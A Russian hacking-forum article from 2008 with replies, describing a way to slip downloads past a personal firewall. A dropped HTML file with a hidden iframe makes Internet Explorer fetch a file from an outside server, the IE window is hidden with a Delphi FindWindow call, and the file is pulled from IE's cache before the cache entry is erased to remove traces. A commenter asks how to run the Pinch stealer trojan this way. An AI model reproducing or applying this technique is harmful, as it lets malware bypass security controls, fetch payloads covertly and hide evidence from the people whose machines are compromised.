Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Хитрый обход файрволов. Часть 2. (https://forum.antichat.xyz/showthread.php?t=68398)

desTiny 25.04.2008 19:45
Хитрый обход файрволов. Часть 2.
 
I. Цель продолжения
Сейчас я продолжу говорить о способе обхода фаеров, начатом ТуТ. Как можно было бы заметить, метод, описаный в первой части, не даёт ответа на вопрос "Как скачать что-то из сети?" Я попробую исправить это недоразумение. Минус метода всё тот же – он годится только для обхода ограничений, связанных с сетевой активностью, так как используется создание процесса. В большинстве случаев, процесс незаметно можно создать без возмущений фаера, но в некоторых случаях нужна СИ...

Предупреждение: в статье используется дельфийский код! :)

II. "Подправка" идеи из первой части
Запускаем IE, открываем страничку и читаем её содержимое из кэша. Хорошо бы ещё удалить её после этого оттуда по двум причинам:
1) IE иногда криво сохраняет записи в кэш повторно
2) Просто уничтожить следы жизнедеятельности :)

III. Реализация
Опять, наша цель - файл ".htm". А конкретно в приведённой ниже реализации я использую к тому же и сокрытие окошка IE.

Итак, записываем файл типа “Readme!!!.htm” примерно такого содержания:

PHP код:
<html>
<head>
<!--

для дальнейшего прятания IE заголовок окна важен!!1

-->
<title>
4 t3st purposes
</title>
</head>
<body>тра-та-таспасибо за установку великого программного продукта и т.п.

<iframe width=”0” height=”0” style=”visibilityhidden” src=”http://server.com/doenload_good_file.php”></iframe>

</body></html
И, как и в первой части, запускаем файл (“explorer.exe Readme!!!.htm”).

После чего ждём некоторое время, пока IE обновит кэш, и грузим файл из кэша,с последующим его удалением.


На этом идея реализации кончается.
IV. Файлы для статьи.
Тут реализован данный механизм с различными вариантами открытия обозревателя

get.php:
PHP код:
<?
echo "You random is: " rand();
?>
http://i005.radikal.ru/0804/92/dd36e1b7251d.jpg
И основной код, на который, кстати, я, совместно с исследованием структуры файла index.dat, потратил часов 10, пока не узнал, что есть API для работы с ним (работающие, правда, также не безупречно как и результат моих страданий :) см. пункт II.)
Сорцы «клиента» и откомпиленный экземпляр (Delphi! Кстати, интересно будет посмотреть тем, кто хочет разобраться с IE-кэшем)
Особых пояснений не даю, дабы такой способ не получил особенно широкого распространения.

V. Заключение
Всё :)
Re всем, кто меня знает, помнит и т.п.:)

©73ru5 aka desTiny, 2008.

desTiny 26.04.2008 20:47
Небольшое исправление: в коде вместо
t := FindWindow(nil, '4 t3st purposes - Microsoft Internet Explorer');
сильно лучше, зоть и не обязательно, использовать
t := FindWindow(nil, title +' - Microsoft Internet Explorer');

Bloodmoon 27.05.2008 18:57
Вот именно,и я не поняла))))

desTiny 27.05.2008 20:39
Цитата:
Сообщение от Zedo83
нихрена не понял =)
как пинча пустить через IE или Firefox ?)
Цитата:
Сообщение от Bloodmoon
Вот именно,и я не поняла))))
Вот я и старался, чтобы поняли не все :cool:

De-visible 28.05.2008 00:07
Цитата:
Сообщение от desTiny
Вот я и старался, чтобы поняли не все :cool:
Это есть зашита от гостей! :D
Статья полезная:)


Время: 23:17